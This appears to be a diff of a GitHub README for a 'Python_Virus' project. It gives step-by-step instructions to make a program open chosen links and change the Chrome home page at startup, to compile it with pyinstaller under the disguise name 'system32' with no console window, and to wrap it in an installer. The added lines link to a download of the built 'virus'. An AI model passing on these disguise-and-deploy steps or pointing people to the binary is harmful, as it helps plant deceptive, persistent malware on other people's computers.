Fadexboss/Python_Virus/README.md

 -Which link you want to open when the computer starts, you can do this by changing the link in the 5th line of the code in the chrome.py file.<br>
 -You can do this by changing the link in line 16 of the code in the chrome.py file, whichever link you want the home page of when the computer starts.<br>
 -We install the pyinstaller library, then write this in the terminal "-pyinstaller --name=system32 --icon=wolf.ico --noconsole start.py "<br>
--now our virus starts working by running the system32.exe file in the ready folder<br>
+-Now our virus starts working by running the system32.exe file in the ready folder<br>
 -Let's convert the exe file we created into a setup file using inno setup compiler<br>
 -Congratulations you have a professional virus I hope you don't use it for malicious purposes.<br>
 -HAVE NİCE DAY!!<br>

+# Try
+-If you want to try the virus I created, [Link](https://drive.google.com/file/d/1g84-afUqoKHez2lKBqyW9CYCleEnDJBX/view?usp=sharing)